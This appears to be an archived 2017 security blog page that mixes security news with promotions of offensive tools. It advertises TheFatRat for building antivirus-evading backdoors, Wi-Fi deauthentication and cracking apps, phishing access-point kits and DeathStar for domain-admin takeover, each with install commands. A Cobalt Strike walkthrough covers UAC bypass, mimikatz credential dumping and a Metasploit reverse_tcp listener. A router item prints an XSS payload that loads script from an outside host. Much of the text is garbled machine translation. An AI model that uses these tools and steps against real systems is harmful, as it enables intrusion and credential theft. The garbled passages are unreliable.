About

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks

Thursday 29 June 2017

German hackers use the Pastebin website to spread Houdini worms

According to foreign media reported on the 27th, Recorded Future security experts found a German hacker through the Pastebin website spread Houdini worm.
The survey shows that the Houdini worm developer also appears to be one of the founders of the MoWare HFD variant of the open source extortion software. Security experts say the malicious script released by the Pastebin website Visual Basic peaked in August, October, and March, and most of the script was used by an attacker to spread the Houdini worm. This type of attack first appeared in 2013 and updated in 2016.

Recorded Future found 213 malicious posts on the Pastebin website, including a first-level domain with 105 subdomains. Analysis shows that the first-level domain name and sub-domain name from the dynamic DNS provider, because the attacker is the use of other users to publish Houdini worm malicious script, security experts can confirm the information only: from the German registrant Mohammed Rad (Mohammed Raad) , The relevant email is “vicsworsbaghdad@gmail.com”.

Google found the above information and found Facebook profile using the same information. The survey shows that Mohammed Raad is one of the main members of the German Anonymous organization. In addition, Facebook’s profile also includes the member’s recent conversations related to the blackmail software MoWare HFD.

Red Hat Enterprise Linux 7.4 Beta release

Red Hat has announced the latest beta version of the company’s Red Hat Enterprise Linux 7.x series, which includes bug fixes and some new features for the 7.x series.

It can be seen that the new version is still focused on the security aspects of the system. To protect against the latest threats and provide a more secure platform for mission-critical deployments, Red Hat Enterprise Linux 7.4 Beta introduces several new security features, including:
  • Support for Network Bound Disk Encryption – a tool to reduce the scale management burden of disk encryption
  • OpenSSL HTTP / 2.0 enhancements – Multiple new transport layer security (TLS) protocol functions, such as Application Layer Protocol Negotiation (ALPN), can be implemented in OpenSSL.
  • Updated auditing features – designed to make it easier for administrators to filter events that audit system records, gather more information from critical events, and understand a large number of records
For additional information, please refer to the company’s  announcement and release notes , download address .

TheFatRat v1.9: Create backdoor & bypass AV

Thefatrat

An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection.

Automating metasploit functions

  • Create backdoor for windows , linux , mac and android
  • bypass antivirus backdoorr
  • Checks for metasploit service and starts if not present
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
  • Start multiple meterpreter reverse_tcp listners
  • Fast Search in searchsploit
  • Bypass AV
  • File pumper
  • Create backdoor with another techniq
  • Autorunscript for listeners ( easy to use )
  • Drop into Msfconsole
  • Some other fun stuff

Change log v1.9

  • v1.9.4 – Fatrat will be full terminal mode , Powerstage tool added , Setup script rebuilded
  • v1.9.3 – Added update script
  • v1.9.3 – Dex2Jar will be installed from now on from Fatrat setup manually on user system (reason: Kali repo still uses old version)
  • v1.9.3 – Updated Android build tools to V.26 RC1 & Android Platform V. 25-R03
  • v1.9.3 – Updated dana travis backdoor-apk to 0.2.2 into fatrat / added openssl in setup
  • v1.9.2 – Msfvenom Android rat will be signed with android certificate , so it can be installed properly
  • v1.9.2 – Implemented Default Lhost & Lport config to fatrat & powerfull shell creator
  • v1.9.2 – Fixed payload in pnwinds option2
  • v1.9.2 – Implemented Stop functions in pnwinds
  • v1.9.2 – New signing process in old method backdoor apk & option to create listener
  • v1.9.2 – Implemented possibility for user to save msfconsole listeners
  • v1.9.2 – Fixes in Microsploit
  • v1.9.2 – Implemented local ip , public ip & hostname display to powerfull.sh
  • v1.9.2 – Implemented local ip , public ip & hostname display before user set Lhost
  • v1.9.2 – Implemented log creation for microsploit & fixed bugs
  • v1.9.2 – Added effective way to detect user linux distribution
  • v1.9.2 – Setup.sh ( patched )
  • v1.9.2 – bug in microsploit ( patched )
  • v1.9.2 – delt some function and variable
  • v1.9.1 – v1.9.1 – Implemented Microsploit (Office Exploitation Tool)
  • v1.9b – Implemented Backdoor-apk from Dana James Traversie in this version .{ Less tools to install during setup.sh }
  • v1.9.0 – update script setup.sh
  • v1.9.0 – del some variable and function
  • v1.9.0 – fixed typo and bugs
  • v1.9.0 – Backdoor APKS have a new payload hiding method in rat apk to not be detected .
  • v1.9.0 – APK (5) rat rebuild totally changed .(adapted backdoor-apk script to fatrat to both work together)
  • v1.9.0 – Apktool will not be installed no more by setup.sh , the same thing applies to : dx , zipalign (apktool on debian repo is 2.2.1 , and that version have a bug that gives error on compiling the apks , so , apktool and android tools were updated to latest version 25.0.2 and embeded in (tools) directory of fatrat .

Download & Installation

git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
Source: Github

Modern JavaScript

Keep up-to-date with the evolving world of JavaScript.
It’s not uncommon these days to see people complaining about how complex JavaScript development seems to have become. If you’re learning JS, it won’t take long for you to be exposed to the enormity of the ecosystem and the sheer number of moving pieces you need to understand (at least conceptually) to build a modern web application.
Package management, linting, transpilation, module bundling, minification, source maps, frameworks, unit testing, hot reloading… it can’t be denied that this is a lot more complex than just including a couple of script tags in your page and FTPing it up to the server. This anthology is a collection of articles, hand-picked from SitePoint’s JavaScript channel with the aim of giving you a head start on modern JavaScript development. Use this eBook to keep up to date with the latest developments!

Download

Viruses, Spyware, Malware, etc. Explained: Understanding Online Threats

By downloading this free guide, you agree to receive regular updates on the latest cool apps, product reviews, and giveaways from MakeUseOf.
When you start to think about all the things that could go wrong when browsing the Internet, the web starts to look like a pretty scary place. Luckily, Internet users as a whole are getting far more savvy, and better at recognizing risky online behavior.
While pages with a dozen download buttons – or auto-checked boxes that tricked us into downloading things we didn’t want – are no longer quite as effective as they once were, that doesn’t mean there aren’t hackers out there right now trying to come up with new methods of deception. In order to protect ourselves from these threats it’s important to understand just what they are, and how they differ. Dive into this guide to learn more!

Download

NTFS Forensics Malware and vulnerabilities

Top 3 Search Engine for Penetration Tester

Here I will introduce the three Web vulnerability search engine.
  1. ShodanShodan , the official definition of himself Computer Search Engine (Computer Resource Search Engine), is American man John Mase Li spent nearly 10 years to build a search engine that can search almost all US industrial control and connected to the network system .Shodan Unlike traditional search engines such as Google, use Web crawlers to traverse your entire site, but directly into the channel behind the Internet, various types of port equipment audits, and never stops looking for the Internet and all associated servers, camera, printers, routers , and so on. Shodan month will be at about 500 million server around the clock to gather information.
    This engine can search, locate all devices connected to the network server. Shodan works produced by various types of port equipment system flag information (banners) audits generate search results, so when you use it, the need to understand a little knowledge of the system flag information.
    Numerous industrial control computer, waterworks and power grid and other automation systems are connected to the network, some of which exist loopholes , moderate levels of hackers will be able to dive into these systems. Industrial control computer firewall protection usually at work, but the protection of a firewall can easily be connected to the network and erosion. Shodan tutorial, please visit here.
  2. ZoomEyeZoomEye is a search engine for cyberspace that lets the user find specific network components(ip, services, etc.).ZoomEye API is a web service that provides convenient access to ZoomEye features, data, information over HTTPS. The platform API empowers developers to automate, extend and connected with ZoomEye. You can use the ZoomEye platform API to programmatically create apps, provision some add-ons and perform some automate tasks. Just imagine that what you could do amazing stuff with ZoomEye.
  3. CensysCensys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet. Driven by Internet-wide scanning, Censys lets researchers find specific hosts and create aggregate reports on how devices, websites, and certificates are configured and deployed. [more information]

0 How to Write Fully Undetectable Malware

Crypto 101

Want to know how to exploit a common cryptographic flaw or forge administrator cookies, recover passwords?
This is an introductory course on cryptography, freely available for programmers of all ages and skill levels. It comes with everything you need to understand complete systems such as SSL/TLS, block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms.
Crypto 101 is intended as an introduction to cryptography for programmers of any skill level. It starts with very simple primitives, and gradually introduces new ones, demonstrating why they are necessary. And eventually, all of this is put together into complete, practical cryptosystems, such as TLS, GPG and OTR.
If you are an everyday programmer who is also interested in how cryptosystems work, what are you waiting for?
Offered Free by: lvh

Download

15 things against DDoS attacks

Today i am going to describes the 15 things against DDoS attacks
DDoS attacks mainly to two categories: bandwidth exhaustion attacks and resource exhaustion attacks, in order to effectively curb these two types of attacks, you can follow the steps listed in this article.

To combat DDoS (distributed denial of service) attacks, you need to have a clear understanding of what happened on the attack. Simply put, DDoS attacks through the use of server vulnerabilities, or resources (such as memory, hard disk consumption on the server etc.) to achieve the purpose. Tou can follow the steps listed below to do:
  1. If only a few computers are the source of the attack and you have identified the IP addresses for those sources, you place an ACL (access control list) on the firewall server to block these access from those IPs. If possible, change the IP address of the web server for a period of time, but if the attacker resolves your newly configured IP by querying your DNS server, this is no longer valid.
  2. If you are sure that the attack comes from a particular country, consider blocking the IP from that country, at least for a while.
  3. Monitoring the incoming network traffic. In this way you can know who is visiting your network and can monitor the exception to the visitor, which can analyze the log and source IP afterwards. Before a large-scale attack, an attacker could use a small number of attacks to test the robustness of your network.
  4. The most effective (and expensive) solution for bandwidth-consuming attacks is to buy more bandwidth.
  5. You can also use high-performance load balancing software, the use of multiple servers, and deployed in different data centers.
  6. The use of load balancing for web and other resources, while also using the same strategy to protect DNS.
  7. Optimize the use of resources to improve web server load capacity. For example, the use of apache can install apachebooster plug-in, the plug-in and varnish and nginx integration, you can deal with the sudden increase in traffic and memory footprint.
  8. The use of highly scalable DNS devices to protect DDOS attacks against DNS. Consider the commercial solution for Cloudflare, which can provide DDOS attack protection for DNS or TCP/IP from layer 3 to layer 7.
  9. Enable the router or firewall anti-IP spoofing function. CISCO ASA firewall in the configuration of the function than in the router more convenient. Enable this feature in ASDM (Cisco Adaptive Security Device Manager) by clicking “Firewall” in “Configuration”, finding “anti-spoofing” and clicking Enable. You can also use the ACL (access control list) in the router to prevent IP spoofing, first for the network to create ACL, and then applied to the Internet interface.
  10. The use of third-party services to protect your site. There are many companies have such services, providing high-performance basic network facilities to help you resist denial of service attacks. You only need to pay hundreds of dollars a month on the line.
  11. Pay attention to the security configuration of the server, to avoid resource exhaustion DDOS attacks.
  12. Listen to the views of experts, for the attack in advance to respond to the emergency program.
  13. Monitoring the network and web traffic. If it is possible to configure multiple analysis tools, such as Statcounter and Google analytics, you can more visually understand the pattern of traffic changes and get more information from it.
  14. To protect DNS to avoid DNS amplification attacks.
  15. Disable ICMP on the router. Open ICMP only when testing is required. The following strategies are also considered when configuring the router: flow control, packet filtering, half-connection timeout, garbage packet discard, source forged packet drop, SYN threshold, disable ICMP and UDP broadcast

Monday 26 June 2017

Get Wi-Fi password with only text message to the router

Recently, German security researcher Jan Hörsch found that there was a magical vulnerability in the router, sending a text message to the router, and it would reply the administrator password and the Wi-Fi password as a text message.
What is this message?
<script src =//n.ms/a.js> </script>

The vulnerable router is TP-Link M5350, a portable 3G router. As a 3G router, TP-Link M5350 supports SMS messaging, but in the SMS function location is not well filtered, so that a loophole.
Similar loopholes in the Internet products are more common, but can cause such effects are very rare, visual inspection is TP-Link internal security process failed to notice.

Hijacker v1-stable: Wireless Toolkit Application for Android

Hijacker

Hijacker is a Graphical User Interface for the wireless auditing tools airodump-ng, aireplay-ng and mdk3. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.
This application requires an android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 (and BCM4358 (although injection is not yet supported so no aireplay or mdk)) chipset will work with Nexmon. Also, devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.
The required tools are included in the app. To install them go to Settings and click “Install Tools”. This will install everything in the directory you select. If you have already installed them, you don’t have to do anything. You can also have them at any directory you want and set the directories in Settings, though this might cause the wireless tools not being found by the aircrack-ng suite. The Nexmon driver and management utility is also included.
Root is also necessary, as these tools need root to work. If you don’t grant root permissions to it, it hangs… for some reason… don’t know why…
Features:
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a network (by measuring beacons and data packets) and its clients
  • Deauthenticate all the clients of a network
  • Deauthenticate a specific client from the network it’s connected
  • MDK3 Beacon Flooding with custom SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Try to get a WPA handshake or gather IVs to crack a WEP network
  • Statistics about access points (only encryption for now)
  • See the manufacturer of a device (AP or station) from a OUI database (pulled from IEEE)
  • See the signal power of devices and filter the ones that are closer to you
  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard, so you can run them in a terminal if something goes wrong
  • Include the tools
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
  • .cap files cracking with custom wordlist
  • Save captured packets in .cap file
  • Create custom commands to be ran on an access point or a client with one click
Installation:
Make sure:
  • you are on Android 5+
  • you are rooted. SuperSU is required. If you are on CM, install SuperSU
  • have installed busybox (opened and installed the tools)
  • have a firmware to support Monitor Mode on your wireless interface
APK Download: Hijacker-release-v1.apk Source: https://github.com/chrisk44/Hijacker

Fern Wifi Cracker: wireless security audit tools

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks

 

Prerequisites

The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on Debian based systems using “apt-get install program” or otherwise downloaded and installed manually
1. Aircrack-NG
2. Python-Scapy
3. Python Qt4
4. Python
5. Subversion
6. Xterm
7. Reaver (for WPS Attacks)
8. Macchanger

Features


Fern Wifi Cracker currently supports the following features:
1. WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
2. WPA/WPA2 Cracking with Dictionary or WPS based attacks
3. Automatic saving of key in database on successful crack
4. Automatic Access Point Attack System
5. Session Hijacking (Passive and Ethernet Modes)
6. Access Point MAC Address Geo Location Tracking
7. Internal MITM Engine
8. Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
9. Update Support

Installation

Download Fern-Wifi-Cracker here, Installation on Debian Package supported systems:

root@host:~# dpkg -i Fern_Open_Source_2.2_all.deb

The source code for the program can be fetched using the following command on terminal

root@host:~# svn checkout http://github.com/savio-code/fern-wifi-cracker/trunk/Fern-Wifi-Cracker/

Demo

BoopSuite: wireless auditing and security testing toolkit

BoopSuite is an up and coming suite of wireless tools designed to be easy to use and powerful in scope, written in python with semicolons, because I hate children.

Installation

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git
cd BoopSuite
pip install -r requirements.txt
chmod +x setup.py
./setup.py

Usage

To start sniffing:
boopsniff -i wlan1mon
To specify a channel:
boopsniff -i wlan1mon -c 6
Boop also works on the 5ghz spectrum if you have a supporting card:
boopsniff -i wlan1mon -f 5
Reporting can also be enabled:
boopsniff -i wlan1mon -r ~/report.txt
If some processes are interfering then you can preemptively kill them with:
boopsniff -i wlan1mon -k
If you want to see unassociated clients:
boopsniff -i wlan1mon -u
If you want to filter by a specific AP mac address:
boopsniff -i wlan1mon -a xx:xx:xx:xx:xx:xx
New Update includes a gui tool:
boopsniff_gui
Set card to monitor mode:
boop -i wlan1
Set card to managed mode:
boop -i wlan1mon
Set card to a specific name:
boop -i wlan1 -n boop1
note: will enable or disable monitor mode accordingly.
Set channel on card:
boop -i wlan1 -c 11
Note: Will do error checking if you specify a channel the card doesnt support and is ready for cards supporting the 5GHz network.
Kill any interfering tasks:
boop -i wlan1 -k
Put it all together:
boop -i wlan1 -n boop1 -c 11 -k
NOTE: boop will always switch the mode from managed to monitor and vice versa.
Source: Github

[Collection] Wireless Penetration Testing Toolkit

  1. wifite
    Link Project: https://github.com/derv82/wifite
    wifite written by py a wireless security testing tools, which is essentially a combination of command-line aircrack-ng, reaver, pyrit, cowpatty, tshark and several other tools, but it simplifies the process of interaction between the tools and the the command line just one button to start with a detailed description and guide the process, so ease of use is very prominent.
  2. wifiphisher
    Link Project: https://github.com/sophron/wifiphisher
    With a relatively novel idea I get malicious wifi connection password. The software will ask you to use two wireless network card, a target for AP initiation Deauth, the client is disconnected, the other LAN users to build the same SSID AP, so that the client and make it even come when you want to connect internet, forced redirection to a phishing page (can be customized). For card compatibility, it also performed well.
  3. wifi-pumpkin
    Link Project: https://github.com/P0cL4bs/WiFi-Pumpkin
    Very friendly graphic user interface, good handling, my favorite one is the establishment of phishing wifi attack tools, rich functional interface, ease of use is excellent. Compatibility is also very good. Researcher  is actively update them, we can continue to focus on this fun project.
  4. fruitywifi
    Link Project: https://github.com/xtr4nge/FruityWifi
    FruityWifi is an open source tool to audit wireless networks, also uses the web as an interactive interface, ease of use features buttons and plug-ins rich.
  5. mama toolkit
    Link Project: https://github.com/sensepost/mana
    which regarded the pace of a set of functions, the use of net-creds, sslstrip rogue ap achieve the middle attack.
  6. 3vilTwinAttacker
    Link Project:https://github.com/wi-fi-analyzer/3vilTwinAttacker
    Much like wifi-pumpkin interface. Has a good graphical interface, the overall experience is very good, good ease of use. Good compatibility. Researcher has hardly been updated.
  7. ghost-phisher
    Link Project: http://tools.kali.org/information-gathering/ghost-phisher
    It has a good graphical interface, but almost no fault tolerance, many options easily confusing, but the overall feeling is still very good use. It can be a key to establish rogue ap, and protect dhcp, dns services interface, easy to launch a variety of middle attack, ease of use is good. Compatible good. Kali has been made official team updated original repo.
  8. fluxion
    Link Project: https://github.com/wi-fi-analyzer/fluxion

Penetration Testing on Intranet Netkwork with Cobalt strike

Introduction

Cobalt Strike is software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response.

Environment

  • Target: web server is an internal network host
  • Attacker: linux vps

Penetration Testing

Start cobal strike
./teamserver vps_ip password
To establish a connection, even after we still the same first to establish listener, and then generate an exe Trojans, which in the previous article has been introduced, not too much to say, and then we upload the exe to webshell and implementation, Found in the client has been on the line.

But our authority is not very high, just a webserver permissions, commonly used to mention the script has been tried, but not how to do?
In fact, through the stri strike strike may be achieved, the use of Bypass UAC
Click on the target, right -> access -> bypass uac, and then wait, the following will be prompted whether the success of success, and after the success of the list will be generated in the above a user with * number of host, as shown below

Now we can catch the password, in the cobal strike also integrated mimikatz, in the access -> Run mimikatz, and then you can see the password down.

If you do not want to find their own account password, you can view in the credentials, it is convenient.
In the network penetration, in a shell machine on the deployment of a socks, you can use the local tools to penetrate the network, so the blend strike is also integrated function, pivoting -> socks server established successfully, will be shown below:
Then we can proxy through the proxychains within the network penetration.
Of course, as a powerful collaborative work platform + penetration weapon, how could there be some common scanning function.
The cobalt strike integrates the port scan, the location is in explore -> port scan.
The default scan is / 24, you can choose a variety of scanning methods.
We can also explore -> net view for internal network survival host detection.
If you think these features are too few, the coaching strike can also be used with msf, first we need to use msf to establish a monitor, the command is as follows:
msf> use exploit/multi/handler 
msf exploit (handler)> set payload windows/meterpreter/reverse_tcp 
Payload => windows /meterpreter/reverse_tcp 
msf exploit (handler)> set lhost 192.168.146.178 
lhost => 192.168.146.178 
msf exploit (handler)> 
Set lport 2222 lport => 2222 
msf exploit (handler)> exploit-j 

Then we create a new monitor in the cobalt strike, select windows/foreign/reverse_tcp,

and then select the following :
Select just select the listener, and then we return to msf, we have seen the session has been.
Sometimes, we need to enter the network machine, such as some software needs to open in the desktop environment, or some administrators will put some things on the desktop, coaching strike also thought of this problem, so we can also enter through this Desktop environment.

[BlackHat Tool] apt2: automated penetration toolkit

APT2 – An Automated Penetration Testing Toolkit

This tool will perform an NMap scan, or import the results of a scan from Nexpose, Nessus, or NMap. The processesd results will be used to launch exploit and enumeration modules according to the configurable Safe Level and enumerated service information.
All module results are stored on localhost and are part of APT2’s Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.

Change log v1.0-20170613

+ Added packaging and fix apt2_whois
+ fixed issues with misc data files and installing packages.
+ module: temp fix till I get time to do a better one.

Setup

NOTE: APT2 is currently only tested on Linux based OSes. If you can confirm that it works on other OSes, please let us know.
On Kali Linux install python-nmap library:
  • pip install python-nmap
  • pip install pysmb
  • pip install yattag
  • pip install scapy
  • pip install ftputil
  • pip install msgpack-python

Current External Program/Script Dependencies

To make full use of all of APT2’s modules, the following external dependencies should be install on your system:
convert, dirb, hydra, java, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan, xwd

Configuration (Optional)

APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire.
Current options include:
  • metasploit
  • nmap
  • threading
Metasploit RPC API (metasploit)
APT2 can utuilize your host’s Metasploit RPC interface (MSGRPC). Additional Information can be found here: https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html
NMAP
Configure NMAP scan settings to include the target, scan type, scan port range, and scan flags. These settings can be configured while the program is running.
Threading
Configure the number of the threads APT2 will use.

Run:

No Options:

python apt2 or ./apt2

With Configuration File

python apt2 -C <config.txt>

Import Nexpose, Nessus, or NMap XML

python apt2 -f <nmap.xml>

Specify Target Range to Start

python apt2 -f 192.168.1.0/24

Safe Level

Safe levels indicate how safe a module is to run againsts a target. The scale runs from 1 to 5 with 5 being the safest. The default configuration uses a Safe Level of 4 but can be set with the -s or --safelevel command line flags.

Usage:

usage: apt2.py [-h] [-C <config.txt>] [-f [<input file> [<input file> ...]]]
[--target] [--ip <local IP>] [-v] [-s SAFE_LEVEL] [-b]
[--listmodules]
optional arguments:
-h, --help            show this help message and exit
-v, --verbosity       increase output verbosity
-s SAFE_LEVEL, --safelevel SAFE_LEVEL
set min safe level for modules
-b, --bypassmenu      bypass menu and run from command line arguments
inputs:
-C <config.txt>       config file
-f [<input file> [<input file> ...]]
one of more input files seperated by spaces
--target              initial scan target(s)
ADVANCED:
--ip <local IP>       defaults to ip of interface
misc:
--listmodules         list out all current modules

Modules

-----------------------
LIST OF CURRENT MODULES
-----------------------
nmaploadxml               Load NMap XML File
hydrasmbpassword          Attempt to bruteforce SMB passwords
nullsessionrpcclient      Test for NULL Session
msf_snmpenumshares        Enumerate SMB Shares via LanManager OID Values
nmapbasescan              Standard NMap Scan
impacketsecretsdump       Test for NULL Session
msf_dumphashes            Gather hashes from MSF Sessions
msf_smbuserenum           Get List of Users From SMB
anonftp                   Test for Anonymous FTP
searchnfsshare            Search files on NFS Shares
crackPasswordHashJohnTR   Attempt to crack any password hashes
msf_vncnoneauth           Detect VNC Services with the None authentication type
nmapsslscan               NMap SSL Scan
nmapsmbsigning            NMap SMB-Signing Scan
responder                 Run Responder and watch for hashes
msf_openx11               Attempt Login To Open X11 Service
nmapvncbrute              NMap VNC Brute Scan
msf_gathersessioninfo     Get Info about any new sessions
nmapsmbshares             NMap SMB Share Scan
userenumrpcclient         Get List of Users From SMB
httpscreenshot            Get Screen Shot of Web Pages
httpserverversion         Get HTTP Server Version
nullsessionsmbclient      Test for NULL Session
openx11                   Attempt Login To Open X11 Servicei and Get Screenshot
msf_snmplogin             Attempt Login Using Common Community Strings
msf_snmpenumusers         Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
httpoptions               Get HTTP Options
nmapnfsshares             NMap NFS Share Scan
msf_javarmi               Attempt to Exploit A Java RMI Service
anonldap                  Test for Anonymous LDAP Searches
ssltestsslserver          Determine SSL protocols and ciphers
gethostname               Determine the hostname for each IP
sslsslscan                Determine SSL protocols and ciphers
nmapms08067scan           NMap MS08-067 Scan
msf_ms08_067              Attempt to exploit MS08-067

Auto Web Application Penetration Testing: Intelligence Gathering

Hi all,
A penetration test (pentest for short) is a method of attacking a computer’s systems in the hope of finding weaknesses in its security. If the pentest successfully gains access, it shows that computer functionality and data may be compromised.
Penetration tests serve a range of valuable purposes. One its main purposes is finding vulnerabilities that are difficult for automated security systems to detect. Additionally, they determine the impact of attacks on computer systems, test network defense systems, and provide details needed to support an increase in spending on security technology.
The testing is executed based on the following methodology:
More info, please read this good article.
On this post, i want to introduce my auto_webapp_pentest script.
Intelligence Gathering option
+ Fiding Subdomain
My script are going to use some script for finding subdomain
Fuzzing tool
Sublist3r
Brute force dns
Finally, save result.txt file.
+ Fingerprint WebServer
On this option, i am going to use whatweb, nikto, wafw00f and more for gathering my target webserver.
+ Discover Content
Finding target CMS => Fuzzing target CMS (Check deafult & backup…files, Vulnerability scanning)
If your target are running WordPress, Joomla, Drupal, … this script will enumerate all plug-in, themes, sensitive directory and vulnerability.
For example, my target are running vBulletin:

DEMO

Now, i am continuing to write my script. So when i completed, i will share for you.

pyfiscan: Free web-application vulnerability and version scanner

Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.

Detects following software

  • ATutor
  • BigTree CMS
  • Bugzilla
  • Centreon
  • Claroline
  • ClipperCMS
  • CMSimple
  • CMSMS
  • Collabtive
  • Concrete5
  • Coppermine
  • Cotonti
  • Croogo
  • CubeCart
  • Dolibarr
  • Dotclear
  • Drupal
  • e107
  • EspoCRM
  • Etherpad
  • FluxBB
  • Foswiki
  • Gallery
  • Gollum
  • HelpDEZk
  • HumHub
  • ImpressCMS
  • ImpressPages
  • Jamroom
  • Joomla
  • KCFinder
  • LiteCart
  • Magnolia
  • Mahara
  • MantisBT
  • MediaWiki
  • Microweber
  • MiniBB
  • MODX Revolution
  • MoinMoin
  • MyBB
  • Nibbleblog
  • Open Source Social Network
  • OpenCart
  • osDate
  • ownCloud
  • Oxwall
  • PBBoard
  • phpBB3
  • PhpGedView
  • phpMyAdmin
  • Piwigo
  • Piwik
  • PmWiki
  • Postfix Admin
  • Redaxo
  • Roundcube
  • SaurusCMS
  • Serendipity
  • SMF
  • SPIP
  • SquirrelMail
  • TestLink
  • TikiWiki
  • Trac
  • WikkaWiki
  • WordPress
  • X-Cart
  • Zenphoto
  • Zikula

Installation

apt-get install python python-pip libpython2.7-dev libyaml-dev git libyaml-dev
git clone https://github.com/fgeek/pyfiscan.git && cd pyfiscan
pip2 install -r requirements.lst
Source: Github

DeathStar: automated domain infiltration tool

DeathStar is a Python script that uses Empire’s RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques.
The following picture can be a good explanation of DeathStar’s operating mechanism:

Installation

git clone https://github.com/byt3bl33d3r/Empire
cd Empire/setup && ./install.sh && cd ..
# Start the Empire console and RESTful API
python empire --rest --username empireadmin --password Password123
git clone https://github.com/byt3bl33d3r/DeathStar
# Death Star is written in Python3
pip3 install -r requirements.txt
./DeathStar.py


 Usage

  1. Run DeathStar
  2. Get an Empire Agent on a box connected to a Domain
  3. Go grab a coffee/tea/redbull, DeathStar will take care of everything else 😉

Demo

Source: Github